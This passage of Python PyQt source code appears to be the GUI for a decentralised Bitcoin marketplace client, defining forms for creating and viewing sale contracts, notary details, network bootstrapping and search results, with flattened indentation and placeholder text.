self.horizontalLayout = QtGui.QHBoxLayout()
self.horizontalLayout.setObjectName(_fromUtf8("horizontalLayout"))
self.seller = QtGui.QListView(self.verticalLayoutWidget)
self.seller.setObjectName(_fromUtf8("seller"))
self.horizontalLayout.addWidget(self.seller)
self.sellerBar = QtGui.QScrollBar(self.verticalLayoutWidget)
self.sellerBar.setOrientation(QtCore.Qt.Vertical)
self.sellerBar.setObjectName(_fromUtf8("sellerBar"))
self.horizontalLayout.addWidget(self.sellerBar)
self.buyerBar = QtGui.QScrollBar(self.verticalLayoutWidget)
self.buyerBar.setOrientation(QtCore.Qt.Vertical)
self.buyerBar.setObjectName(_fromUtf8("buyerBar"))
self.horizontalLayout.addWidget(self.buyerBar)
self.buyer = QtGui.QListView(self.verticalLayoutWidget)
self.buyer.setObjectName(_fromUtf8("buyer"))
self.horizontalLayout.addWidget(self.buyer)
self.verticalLayout.addLayout(self.horizontalLayout)
self.retranslateUi(OrdersMenu)
QtCore.QMetaObject.connectSlotsByName(OrdersMenu)
def retranslateUi(self, OrdersMenu):
OrdersMenu.setWindowTitle(_translate("OrdersMenu", "Form", None))
self.OrderLabel.setText(_translate("OrdersMenu", "Orders", None))
##
# ContractGenUi2
# This class holds the UI for the contract generator
class ContractGenUi2(QtGui.QWidget):
##
# Constructor
# Draws the layout of the "New Contract" tab
def __init__(self):
super(ContractGenUi2, self).__init__()
self.setObjectName(_fromUtf8("Form"))
self.resize(788, 376)
self.setAutoFillBackground(False)
self.gridLayoutWidget = QtGui.QWidget(self)
self.gridLayoutWidget.setGeometry(QtCore.QRect(10, 10, 671, 235))
self.gridLayoutWidget.setObjectName(_fromUtf8("gridLayoutWidget"))
self.gridLayout = QtGui.QGridLayout(self.gridLayoutWidget)
self.gridLayout.setMargin(0)
self.gridLayout.setObjectName(_fromUtf8("gridLayout"))
self.label = QtGui.QLabel(self.gridLayoutWidget)
font = QtGui.QFont()
font.setPointSize(14)
font.setBold(True)
font.setWeight(75)
self.label.setFont(font)
self.label.setObjectName(_fromUtf8("store_details_label"))
self.gridLayout.addWidget(self.label, 1, 0, 1, 1)
self.bitcoin_address_lineEdit = QtGui.QLineEdit(self.gridLayoutWidget)
self.bitcoin_address_lineEdit.setObjectName(_fromUtf8("bitcoin_lineEdit"))
self.gridLayout.addWidget(self.bitcoin_address_lineEdit, 3, 1, 1, 1)
self.label_7 = QtGui.QLabel(self.gridLayoutWidget)
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.label_7.setFont(font)
self.label_7.setObjectName(_fromUtf8("nickname_label"))
self.gridLayout.addWidget(self.label_7, 6, 0, 1, 1)
self.price_lineEdit = QtGui.QLineEdit(self.gridLayoutWidget)
self.price_lineEdit.setObjectName(_fromUtf8("guid_lineEdit"))
self.gridLayout.addWidget(self.price_lineEdit, 5, 1, 1, 1)
self.expiry_lineEdit = QtGui.QLineEdit(self.gridLayoutWidget)
self.expiry_lineEdit.setObjectName(_fromUtf8("email_lineEdit"))
self.gridLayout.addWidget(self.expiry_lineEdit, 6, 1, 1, 1)
self.item_name_lineEdit = QtGui.QLineEdit(self.gridLayoutWidget)
self.item_name_lineEdit.setObjectName(_fromUtf8("add_notary_line"))
self.gridLayout.addWidget(self.item_name_lineEdit, 4, 1, 1, 1)
self.label_6 = QtGui.QLabel(self.gridLayoutWidget)
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.label_6.setFont(font)
self.label_6.setObjectName(_fromUtf8("trusted_notaries_label"))
self.gridLayout.addWidget(self.label_6, 5, 0, 1, 1)
self.label_4 = QtGui.QLabel(self.gridLayoutWidget)
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.label_4.setFont(font)
self.label_4.setObjectName(_fromUtf8("notary_details_label"))
self.gridLayout.addWidget(self.label_4, 3, 0, 1, 1)
self.label_5 = QtGui.QLabel(self.gridLayoutWidget)
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.label_5.setFont(font)
self.label_5.setObjectName(_fromUtf8("shipping_label"))
self.gridLayout.addWidget(self.label_5, 4, 0, 1, 1)
self.label_2 = QtGui.QLabel(self.gridLayoutWidget)
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.label_2.setFont(font)
self.label_2.setLayoutDirection(QtCore.Qt.RightToLeft)
self.label_2.setAutoFillBackground(False)
self.label_2.setAlignment(QtCore.Qt.AlignCenter)
self.label_2.setObjectName(_fromUtf8("keys_label"))
self.gridLayout.addWidget(self.label_2, 2, 1, 1, 1)
self.generate_contract_button = QtGui.QPushButton(self)
self.generate_contract_button.setGeometry(QtCore.QRect(520, 260, 161, 27))
self.generate_contract_button.setObjectName(_fromUtf8("add_notary_label"))
##
# Add keywords
self.keywords_label = QtGui.QLabel(self.gridLayoutWidget)
self.keywords_label.setText("Add keywords")
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.keywords_label.setFont(font)
self.keywords_lineEdit = QtGui.QLineEdit(self.gridLayoutWidget)
self.keywords_lineEdit.setText("Separate keywords by comma (ie word1,word2,word3,...,wordn)")
self.gridLayout.addWidget(self.keywords_label)
self.gridLayout.addWidget(self.keywords_lineEdit)
##
# Add pictures
self.browse_images_label = QtGui.QLabel(self.gridLayoutWidget)
self.browse_images_label.setText("Add images (max 3):")
self.browse_images_label.setFont(font)
self.images_button = QtGui.QPushButton(self.gridLayoutWidget)
self.images_button.setText("Browse...")
self.gridLayout.addWidget(self.browse_images_label)
self.gridLayout.addWidget(self.images_button)
self.images = list()
##
# Add a description
self.description_label = QtGui.QLabel(self.gridLayoutWidget)
self.description_label.setText("Item Description:")
self.description_label.setFont(font)
self.gridLayout.addWidget(self.description_label)
self.description_box = QtGui.QLineEdit(self.gridLayoutWidget)
self.gridLayout.addWidget(self.description_box)
##
        # On click, generate the new contract data
        # On click, find pictures
self.generate_contract_button.clicked.connect(self.generate_from_input)
self.images_button.clicked.connect(self.find_images)
self.label.setText(_translate("Form", "Contract Generator", None))
self.label_7.setText(_translate("Form", "Offer expiry date", None))
self.label_6.setText(_translate("Form", "Price (in BTC) of item to sell", None))
self.label_4.setText(_translate("Form", "Your Bitcoin address", None))
self.label_5.setText(_translate("Form", "Name of item to sell", None))
self.label_2.setText(_translate("Form", "Contract", None))
self.generate_contract_button.setText(_translate("Form", "Generate Contract", None))
##
# Creates a new contract using the fields in the UI
def generate_from_input(self):
contract = dict()
contract['expiry'] = str(self.expiry_lineEdit.text())
contract['price'] = str(self.price_lineEdit.text())
contract['bitcoin_address'] = str(self.bitcoin_address_lineEdit.text())
contract['item_name'] = str(self.item_name_lineEdit.text())
        contract['keywords'] = [str(k) for k in self.keywords_lineEdit.text().split(',')]
contract['description'] = str(self.description_box.text())
contract['images'] = self.images
self.window().id_module.new_contract(contract)
self.window().redraw()
##
# Browse and add images
# Saves the first three selected image paths to self.images (list)
def find_images(self):
self.images = QtGui.QFileDialog.getOpenFileNames(self, 'Add Images', '', '')[0:3]
if len(self.images) != 0:
self.images_button.setText(str(len(self.images)) + " selected")
else:
self.images_button.setText("Browse...")
##
# This class holds the UI for the Contract View Tab
class contractView_Tab(QtGui.QWidget):
##
# Constructor
# Creates the contract view tab
# @param ricardian_contract: ricardian contract being viewed in the tab
def __init__(self, ricardian_contract):
super(contractView_Tab, self).__init__()
self.contract_obj = ricardian_contract
self.setObjectName(_fromUtf8("Form"))
self.resize(1199, 1250)
self.gridLayoutWidget = QtGui.QWidget(self)
self.gridLayoutWidget.setGeometry(QtCore.QRect(0, 570, 801, 231))
self.gridLayoutWidget.setObjectName(_fromUtf8("gridLayoutWidget"))
self.gridLayout = QtGui.QGridLayout(self.gridLayoutWidget)
self.gridLayout.setMargin(0)
self.gridLayout.setObjectName(_fromUtf8("gridLayout"))
self.descriptionTextBrowser = QtGui.QTextBrowser(self.gridLayoutWidget)
self.descriptionTextBrowser.setObjectName(_fromUtf8("descriptionTextBrowser"))
self.gridLayout.addWidget(self.descriptionTextBrowser, 0, 0, 1, 1)
self.verticalLayoutWidget = QtGui.QWidget(self)
self.verticalLayoutWidget.setGeometry(QtCore.QRect(0, 0, 161, 181))
self.verticalLayoutWidget.setObjectName(_fromUtf8("verticalLayoutWidget"))
self.verticalLayout = QtGui.QVBoxLayout(self.verticalLayoutWidget)
self.verticalLayout.setMargin(0)
self.verticalLayout.setObjectName(_fromUtf8("verticalLayout"))
self.label = QtGui.QLabel(self.verticalLayoutWidget)
font = QtGui.QFont()
font.setPointSize(22)
self.label.setFont(font)
self.label.setObjectName(_fromUtf8("label"))
self.verticalLayout.addWidget(self.label)
self.label_2 = QtGui.QLabel(self.verticalLayoutWidget)
font = QtGui.QFont()
font.setPointSize(18)
self.label_2.setFont(font)
self.label_2.setObjectName(_fromUtf8("label_2"))
self.verticalLayout.addWidget(self.label_2)
self.label_3 = QtGui.QLabel(self.verticalLayoutWidget)
self.label_3.setObjectName(_fromUtf8("label_3"))
self.verticalLayout.addWidget(self.label_3)
self.label_4 = QtGui.QLabel(self.verticalLayoutWidget)
self.label_4.setObjectName(_fromUtf8("label_4"))
self.verticalLayout.addWidget(self.label_4)
self.verticalLayoutWidget_3 = QtGui.QWidget(self)
self.verticalLayoutWidget_3.setGeometry(QtCore.QRect(160, 0, 641, 181))
self.verticalLayoutWidget_3.setObjectName(_fromUtf8("verticalLayoutWidget_3"))
self.verticalLayout_3 = QtGui.QVBoxLayout(self.verticalLayoutWidget_3)
self.verticalLayout_3.setMargin(0)
self.verticalLayout_3.setObjectName(_fromUtf8("verticalLayout_3"))
self.itemName = QtGui.QLabel(self.verticalLayoutWidget_3)
font = QtGui.QFont()
font.setPointSize(22)
self.itemName.setFont(font)
self.itemName.setText(_fromUtf8(""))
self.itemName.setObjectName(_fromUtf8("itemName"))
self.verticalLayout_3.addWidget(self.itemName)
self.price = QtGui.QLabel(self.verticalLayoutWidget_3)
font = QtGui.QFont()
font.setPointSize(18)
self.price.setFont(font)
self.price.setText(_fromUtf8(""))
self.price.setObjectName(_fromUtf8("price"))
self.verticalLayout_3.addWidget(self.price)
self.dateUploaded = QtGui.QLabel(self.verticalLayoutWidget_3)
self.dateUploaded.setText(_fromUtf8(""))
self.dateUploaded.setObjectName(_fromUtf8("dateUploaded"))
self.verticalLayout_3.addWidget(self.dateUploaded)
self.expires = QtGui.QLabel(self.verticalLayoutWidget_3)
self.expires.setText(_fromUtf8(""))
self.expires.setObjectName(_fromUtf8("expires"))
self.verticalLayout_3.addWidget(self.expires)
self.label_6 = QtGui.QLabel(self)
self.label_6.setGeometry(QtCore.QRect(0, 540, 91, 17))
self.label_6.setObjectName(_fromUtf8("label_6"))
self.horizontalLayoutWidget = QtGui.QWidget(self)
self.horizontalLayoutWidget.setGeometry(QtCore.QRect(0, 850, 801, 271))
self.horizontalLayoutWidget.setObjectName(_fromUtf8("horizontalLayoutWidget"))
self.horizontalLayout = QtGui.QHBoxLayout(self.horizontalLayoutWidget)
self.horizontalLayout.setMargin(0)
self.horizontalLayout.setObjectName(_fromUtf8("horizontalLayout"))
self.pictureOne = QtGui.QLabel(self.horizontalLayoutWidget)
self.pictureOne.setText(_fromUtf8(""))
self.pictureOne.setObjectName(_fromUtf8("pictureOne"))
self.horizontalLayout.addWidget(self.pictureOne)
self.pictureTwo = QtGui.QLabel(self.horizontalLayoutWidget)
self.pictureTwo.setText(_fromUtf8(""))
self.pictureTwo.setObjectName(_fromUtf8("pictureTwo"))
self.horizontalLayout.addWidget(self.pictureTwo)
self.pictureThree = QtGui.QLabel(self.horizontalLayoutWidget)
self.pictureThree.setText(_fromUtf8(""))
self.pictureThree.setObjectName(_fromUtf8("pictureThree"))
self.horizontalLayout.addWidget(self.pictureThree)
self.label_7 = QtGui.QLabel(self)
self.label_7.setGeometry(QtCore.QRect(0, 820, 66, 17))
self.label_7.setObjectName(_fromUtf8("label_7"))
self.label_8 = QtGui.QLabel(self)
self.label_8.setGeometry(QtCore.QRect(40, 1210, 121, 17))
self.label_8.setObjectName(_fromUtf8("label_8"))
self.desiredQuantitySpinBox = QtGui.QSpinBox(self)
self.desiredQuantitySpinBox.setGeometry(QtCore.QRect(170, 1200, 71, 31))
self.desiredQuantitySpinBox.setObjectName(_fromUtf8("desiredQuantitySpinBox"))
self.label_9 = QtGui.QLabel(self)
self.label_9.setGeometry(QtCore.QRect(250, 1210, 131, 17))
self.label_9.setObjectName(_fromUtf8("label_9"))
self.noteForMerchantLineEdit = QtGui.QLineEdit(self)
self.noteForMerchantLineEdit.setGeometry(QtCore.QRect(400, 1210, 321, 27))
self.noteForMerchantLineEdit.setObjectName(_fromUtf8("noteForMerchantLineEdit"))
self.purchaseButton = QtGui.QPushButton(self)
self.purchaseButton.setGeometry(QtCore.QRect(730, 1210, 98, 27))
self.purchaseButton.setObjectName(_fromUtf8("purchaseButton"))
self.sellerAvatar = QtGui.QLabel(self)
self.sellerAvatar.setGeometry(QtCore.QRect(990, 10, 201, 181))
self.sellerAvatar.setText(_fromUtf8(""))
self.sellerAvatar.setObjectName(_fromUtf8("sellerAvatar"))
self.label_15 = QtGui.QLabel(self)
self.label_15.setGeometry(QtCore.QRect(310, 1170, 81, 17))
self.label_15.setObjectName(_fromUtf8("label_15"))
self.keywords = QtGui.QLineEdit(self)
self.keywords.setGeometry(QtCore.QRect(400, 1170, 321, 27))
self.keywords.setObjectName(_fromUtf8("keywords"))
self.gridLayoutWidget_2 = QtGui.QWidget(self)
self.gridLayoutWidget_2.setGeometry(QtCore.QRect(0, 190, 801, 322))
self.gridLayoutWidget_2.setObjectName(_fromUtf8("gridLayoutWidget_2"))
self.gridLayout_2 = QtGui.QGridLayout(self.gridLayoutWidget_2)
self.gridLayout_2.setMargin(0)
self.gridLayout_2.setObjectName(_fromUtf8("gridLayout_2"))
self.sellerName = QtGui.QLabel(self.gridLayoutWidget_2)
font = QtGui.QFont()
font.setPointSize(22)
self.sellerName.setFont(font)
self.sellerName.setText(_fromUtf8(""))
self.sellerName.setObjectName(_fromUtf8("sellerName"))
self.gridLayout_2.addWidget(self.sellerName, 0, 1, 1, 1)
self.bitcoinReceivingAddress = QtGui.QTextBrowser(self.gridLayoutWidget_2)
self.bitcoinReceivingAddress.setLineWrapMode(QtGui.QTextEdit.NoWrap)
self.bitcoinReceivingAddress.setObjectName(_fromUtf8("bitcoinReceivingAddress"))
self.gridLayout_2.addWidget(self.bitcoinReceivingAddress, 3, 1, 1, 1)
self.guid = QtGui.QTextBrowser(self.gridLayoutWidget_2)
self.guid.setLineWrapMode(QtGui.QTextEdit.NoWrap)
self.guid.setObjectName(_fromUtf8("guid"))
self.gridLayout_2.addWidget(self.guid, 2, 1, 1, 1)
self.sellerEmail = QtGui.QLabel(self.gridLayoutWidget_2)
font = QtGui.QFont()
font.setPointSize(18)
self.sellerEmail.setFont(font)
self.sellerEmail.setText(_fromUtf8(""))
self.sellerEmail.setObjectName(_fromUtf8("sellerEmail"))
self.gridLayout_2.addWidget(self.sellerEmail, 1, 1, 1, 1)
self.label_13 = QtGui.QLabel(self.gridLayoutWidget_2)
self.label_13.setObjectName(_fromUtf8("label_13"))
self.gridLayout_2.addWidget(self.label_13, 2, 0, 1, 1)
self.publicKey = QtGui.QTextBrowser(self.gridLayoutWidget_2)
self.publicKey.setLineWrapMode(QtGui.QTextEdit.NoWrap)
self.publicKey.setObjectName(_fromUtf8("publicKey"))
self.gridLayout_2.addWidget(self.publicKey, 4, 1, 1, 1)
self.label_11 = QtGui.QLabel(self.gridLayoutWidget_2)
font = QtGui.QFont()
font.setPointSize(18)
self.label_11.setFont(font)
self.label_11.setObjectName(_fromUtf8("label_11"))
self.gridLayout_2.addWidget(self.label_11, 1, 0, 1, 1)
self.label_10 = QtGui.QLabel(self.gridLayoutWidget_2)
font = QtGui.QFont()
font.setPointSize(22)
self.label_10.setFont(font)
self.label_10.setObjectName(_fromUtf8("label_10"))
self.gridLayout_2.addWidget(self.label_10, 0, 0, 1, 1)
self.label_12 = QtGui.QLabel(self.gridLayoutWidget_2)
self.label_12.setObjectName(_fromUtf8("label_12"))
self.gridLayout_2.addWidget(self.label_12, 3, 0, 1, 1)
self.label_14 = QtGui.QLabel(self.gridLayoutWidget_2)
self.label_14.setObjectName(_fromUtf8("label_14"))
self.gridLayout_2.addWidget(self.label_14, 4, 0, 1, 1)
self.label_5 = QtGui.QLabel(self)
self.label_5.setGeometry(QtCore.QRect(330, 1130, 66, 17))
self.label_5.setObjectName(_fromUtf8("label_5"))
self.ledger = QtGui.QLineEdit(self)
self.ledger.setGeometry(QtCore.QRect(400, 1130, 321, 27))
self.ledger.setObjectName(_fromUtf8("ledger"))
self.label.setText(_translate("Form", "Item Name:", None))
self.label_2.setText(_translate("Form", "Price:", None))
self.label_3.setText(_translate("Form", "Date Uploaded:", None))
self.label_4.setText(_translate("Form", "Expires:", None))
self.label_6.setText(_translate("Form", "Description: ", None))
self.label_7.setText(_translate("Form", "Pictures:", None))
self.label_8.setText(_translate("Form", "Desired Quantity:", None))
self.label_9.setText(_translate("Form", "Note for Merchant:", None))
self.purchaseButton.setText(_translate("Form", "Purchase", None))
self.label_15.setText(_translate("Form", "Keywords:", None))
self.bitcoinReceivingAddress.setHtml(_translate("Form", "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\" \"http://www.w3.org/TR/REC-html40/strict.dtd\">\n"
"<html><head><meta name=\"qrichtext\" content=\"1\" /><style type=\"text/css\">\n"
"p, li { white-space: pre-wrap; }\n"
"</style></head><body style=\" font-family:\'Ubuntu\'; font-size:11pt; font-weight:400; font-style:normal;\">\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">asdfsdddddddddddddddddddddddddddddddddddddddddddddddddasdfasdfasdfasdfasdfasdfasdffdasdf</p></body></html>", None))
self.guid.setHtml(_translate("Form", "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\" \"http://www.w3.org/TR/REC-html40/strict.dtd\">\n"
"<html><head><meta name=\"qrichtext\" content=\"1\" /><style type=\"text/css\">\n"
"p, li { white-space: pre-wrap; }\n"
"</style></head><body style=\" font-family:\'Ubuntu\'; font-size:11pt; font-weight:400; font-style:normal;\">\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">asdfsddddddddddddddddddddddddddddddddddddddddddddddddd</p></body></html>", None))
self.label_13.setText(_translate("Form", "GUID:", None))
self.publicKey.setHtml(_translate("Form", "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\" \"http://www.w3.org/TR/REC-html40/strict.dtd\">\n"
"<html><head><meta name=\"qrichtext\" content=\"1\" /><style type=\"text/css\">\n"
"p, li { white-space: pre-wrap; }\n"
"</style></head><body style=\" font-family:\'Ubuntu\'; font-size:11pt; font-weight:400; font-style:normal;\">\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">asdfsddddddddddddddddddddddddddddddddddddddddddddddddd</p></body></html>", None))
self.label_11.setText(_translate("Form", "Seller Email:", None))
self.label_10.setText(_translate("Form", "Seller Name:", None))
self.label_12.setText(_translate("Form", "Bitcoin Receiving Address:", None))
self.label_14.setText(_translate("Form", "Public Key:", None))
self.label_5.setText(_translate("Form", "Ledger:", None))
meta = ricardian_contract.get_module('metadata')
id = ricardian_contract.get_module('id')
trade = ricardian_contract.get_module('trade')
ledger = ricardian_contract.get_module('ledger')
##
# Set values from the trade module
self.itemName.setText(trade['name'])
self.price.setText(trade['price'])
self.descriptionTextBrowser.setText(trade['description'])
self.keywords.setText(', '.join(trade['keywords']))
for count, image_store in enumerate(trade['images']):
if count == 0:
self.pictureOne.setPixmap(image_store.get_repr().toqpixmap())
self.pictureOne.setScaledContents(True)
elif count == 1:
self.pictureTwo.setPixmap(image_store.get_repr().toqpixmap())
self.pictureTwo.setScaledContents(True)
elif count == 2:
self.pictureThree.setPixmap(image_store.get_repr().toqpixmap())
self.pictureThree.setScaledContents(True)
##
# Set values from the metadata module
self.dateUploaded.setText(meta['date'])
self.expires.setText(meta['expiry'])
##
# Set values from the seller module
#self.bitcoinRecevingAddress.setText(id['seller']['bitcoinReceivingAddress'])
self.sellerName.setText(id['seller']['nickname'])
self.sellerEmail.setText(id['seller']['email'])
self.guid.setText(id['seller']['guid'])
self.publicKey.setText(id['seller']['pubkey'])
avatar_pm = id['seller']['avatar'].get_repr().toqpixmap()
self.sellerAvatar.setPixmap(avatar_pm)
self.sellerAvatar.setScaledContents(True)
self.purchaseButton.clicked.connect(self.purchase_contract)
##
# Defines action to be taken when purchaseButton is clicked
def purchase_contract(self):
self.window().id_module.make_purchase(self.contract_obj)
self.window().redraw()
##
# This class holds the view for a notary
class notaryViewTab(QtGui.QWidget):
##
# Constructor
# Creates the Notary View Tab
def __init__(self, notary_repr_obj):
super(notaryViewTab, self).__init__()
self.setObjectName(_fromUtf8("Form"))
self.resize(941, 527)
self.label_11 = QtGui.QLabel(self)
self.label_11.setGeometry(QtCore.QRect(540, 6, 231, 211))
self.label_11.setText(_fromUtf8(""))
self.label_11.setObjectName(_fromUtf8("label_11"))
self.gridLayoutWidget = QtGui.QWidget(self)
self.gridLayoutWidget.setGeometry(QtCore.QRect(0, 10, 771, 452))
self.gridLayoutWidget.setObjectName(_fromUtf8("gridLayoutWidget"))
self.gridLayout = QtGui.QGridLayout(self.gridLayoutWidget)
self.gridLayout.setMargin(0)
self.gridLayout.setObjectName(_fromUtf8("gridLayout"))
self.GUID = QtGui.QTextEdit(self.gridLayoutWidget)
self.GUID.setLineWrapMode(QtGui.QTextEdit.NoWrap)
self.GUID.setObjectName(_fromUtf8("GUID"))
self.gridLayout.addWidget(self.GUID, 2, 1, 1, 1)
self.publicKey = QtGui.QTextEdit(self.gridLayoutWidget)
self.publicKey.setLineWrapMode(QtGui.QTextEdit.NoWrap)
self.publicKey.setObjectName(_fromUtf8("publicKey"))
self.gridLayout.addWidget(self.publicKey, 3, 1, 1, 1)
self.bitcoinReceivingAddress = QtGui.QTextEdit(self.gridLayoutWidget)
self.bitcoinReceivingAddress.setLineWrapMode(QtGui.QTextEdit.NoWrap)
self.bitcoinReceivingAddress.setObjectName(_fromUtf8("bitcoinReceivingAddress"))
self.gridLayout.addWidget(self.bitcoinReceivingAddress, 4, 1, 1, 1)
self.label_4 = QtGui.QLabel(self.gridLayoutWidget)
self.label_4.setObjectName(_fromUtf8("label_4"))
self.gridLayout.addWidget(self.label_4, 3, 0, 1, 1)
self.label_7 = QtGui.QLabel(self.gridLayoutWidget)
self.label_7.setObjectName(_fromUtf8("label_7"))
self.gridLayout.addWidget(self.label_7, 5, 0, 1, 1)
self.storeEmail = QtGui.QLabel(self.gridLayoutWidget)
font = QtGui.QFont()
font.setPointSize(18)
self.storeEmail.setFont(font)
self.storeEmail.setText(_fromUtf8(""))
self.storeEmail.setObjectName(_fromUtf8("storeEmail"))
self.gridLayout.addWidget(self.storeEmail, 1, 1, 1, 1)
self.storeName = QtGui.QLabel(self.gridLayoutWidget)
font = QtGui.QFont()
font.setPointSize(22)
self.storeName.setFont(font)
self.storeName.setText(_fromUtf8(""))
self.storeName.setObjectName(_fromUtf8("storeName"))
self.gridLayout.addWidget(self.storeName, 0, 1, 1, 1)
self.label = QtGui.QLabel(self.gridLayoutWidget)
font = QtGui.QFont()
font.setPointSize(22)
self.label.setFont(font)
self.label.setObjectName(_fromUtf8("label"))
self.gridLayout.addWidget(self.label, 0, 0, 1, 1)
self.label_3 = QtGui.QLabel(self.gridLayoutWidget)
self.label_3.setObjectName(_fromUtf8("label_3"))
self.gridLayout.addWidget(self.label_3, 2, 0, 1, 1)
self.label_5 = QtGui.QLabel(self.gridLayoutWidget)
self.label_5.setObjectName(_fromUtf8("label_5"))
self.gridLayout.addWidget(self.label_5, 4, 0, 1, 1)
self.label_2 = QtGui.QLabel(self.gridLayoutWidget)
font = QtGui.QFont()
font.setPointSize(18)
self.label_2.setFont(font)
self.label_2.setObjectName(_fromUtf8("label_2"))
self.gridLayout.addWidget(self.label_2, 1, 0, 1, 1)
self.fee = QtGui.QLabel(self.gridLayoutWidget)
self.fee.setText(_fromUtf8(""))
self.fee.setObjectName(_fromUtf8("fee"))
self.gridLayout.addWidget(self.fee, 5, 1, 1, 1)
self.label_9 = QtGui.QLabel(self.gridLayoutWidget)
self.label_9.setObjectName(_fromUtf8("label_9"))
self.gridLayout.addWidget(self.label_9, 6, 0, 1, 1)
self.description = QtGui.QTextEdit(self.gridLayoutWidget)
self.description.setObjectName(_fromUtf8("description"))
self.gridLayout.addWidget(self.description, 6, 1, 1, 1)
self.label_8 = QtGui.QLabel(self)
self.label_8.setGeometry(QtCore.QRect(800, 20, 221, 211))
self.label_8.setText(_fromUtf8(""))
self.label_8.setObjectName(_fromUtf8("label_8"))
self.avatar = QtGui.QLabel(self)
self.avatar.setGeometry(QtCore.QRect(780, 20, 151, 141))
self.avatar.setText(_fromUtf8(""))
self.avatar.setObjectName(_fromUtf8("avatar"))
self.setWindowTitle(_translate("Form", "Form", None))
self.GUID.setHtml(_translate("Form", "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\" \"http://www.w3.org/TR/REC-html40/strict.dtd\">\n"
"<html><head><meta name=\"qrichtext\" content=\"1\" /><style type=\"text/css\">\n"
"p, li { white-space: pre-wrap; }\n"
"</style></head><body style=\" font-family:\'Ubuntu\'; font-size:11pt; font-weight:400; font-style:normal;\">\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">asdfasdfasdfasdfasdfasdfasdfasdfffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffasddfasdasdfasdfasdfasdffasdf</p></body></html>", None))
self.publicKey.setHtml(_translate("Form", "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\" \"http://www.w3.org/TR/REC-html40/strict.dtd\">\n"
"<html><head><meta name=\"qrichtext\" content=\"1\" /><style type=\"text/css\">\n"
"p, li { white-space: pre-wrap; }\n"
"</style></head><body style=\" font-family:\'Ubuntu\'; font-size:11pt; font-weight:400; font-style:normal;\">\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">asdasdfadfasdfasdfasdfasdfasdfasdffsdsdfffffffffffffffffffffffasdasdfasdfasdfasdfasdfasdfasdfasdasdf</p></body></html>", None))
self.bitcoinReceivingAddress.setHtml(_translate("Form", "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\" \"http://www.w3.org/TR/REC-html40/strict.dtd\">\n"
"<html><head><meta name=\"qrichtext\" content=\"1\" /><style type=\"text/css\">\n"
"p, li { white-space: pre-wrap; }\n"
"</style></head><body style=\" font-family:\'Ubuntu\'; font-size:11pt; font-weight:400; font-style:normal;\">\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">asdfadsfadfasdfasdfasdfasfasdfasfdfsdadsfsdfdfsafdsadfsdfsadsfdafsadfsdasdasdfadsfasdfasdfasdfasdassadfasdfasdfasdfasdfasfdasdfdsaf</p></body></html>", None))
self.label_4.setText(_translate("Form", "Public Key:", None))
self.label_7.setText(_translate("Form", "Fee (%):", None))
self.label.setText(_translate("Form", "User Name:", None))
self.label_3.setText(_translate("Form", "GUID:", None))
self.label_5.setText(_translate("Form", "Bitcoin Receiving Address:", None))
self.label_2.setText(_translate("Form", "User Email:", None))
self.label_9.setText(_translate("Form", "Description", None))
notary_repr = notary_repr_obj.get()
self.bitcoinReceivingAddress.setText(notary_repr['bitcoinReceivingAddress'])
self.avatar.setPixmap(notary_repr['avatar'].get_repr().toqpixmap())
self.avatar.setScaledContents(True)
self.description.setText(notary_repr['description'])
self.fee.setText(notary_repr['fee'])
self.GUID.setText(notary_repr['guid'])
self.storeEmail.setText(notary_repr['email'])
self.publicKey.setText(notary_repr['pubkey'])
self.storeName.setText(notary_repr['name'])
##
# bootStrap_Tab
# This class holds the UI for the bootstrap tab
class bootStrap_Tab(QtGui.QWidget):
##
# Constructor
# Creates the bootstrap tab
def __init__(self):
super(bootStrap_Tab, self).__init__()
self.setObjectName(_fromUtf8("OrdersMenu"))
self.resize(400, 300)
self.pushButton = QtGui.QPushButton(self)
self.pushButton.setGeometry(QtCore.QRect(70, 180, 98, 27))
self.pushButton.setObjectName(_fromUtf8("pushButton"))
self.ip_lineEdit = QtGui.QLineEdit(self)
self.ip_lineEdit.setGeometry(QtCore.QRect(50, 70, 161, 27))
self.ip_lineEdit.setObjectName(_fromUtf8("ip_lineEdit"))
self.port_lineEdit = QtGui.QLineEdit(self)
self.port_lineEdit.setGeometry(QtCore.QRect(50, 120, 161, 27))
self.port_lineEdit.setObjectName(_fromUtf8("port_lineEdit"))
self.setWindowTitle(_translate("OrdersMenu", "Form", None))
self.pushButton.setText(_translate("OrdersMenu", "Bootstrap", None))
self.ip_lineEdit.setText(_translate("OrdersMenu", "Enter IP Address", None))
self.port_lineEdit.setText(_translate("OrdersMenu", "Enter Port Number", None))
##
        # On click, initiate the bootstrap
self.pushButton.clicked.connect(self.initiate_bootstrap)
##
# Attempts to bootstrap the node module to the network using the fields in the tab
def initiate_bootstrap(self):
self.window().node.attempt_bootstrap(str(self.ip_lineEdit.text()), int(self.port_lineEdit.text()))
##
# This class is a view for the results of an OpenBazaar search
class SearchResultsWidget(QtGui.QWidget):
def __init__(self, search, list_of_contracts):
super(SearchResultsWidget, self).__init__()
##
# Save the list of contracts, so when one is selected we can draw the contract
        # view using its data
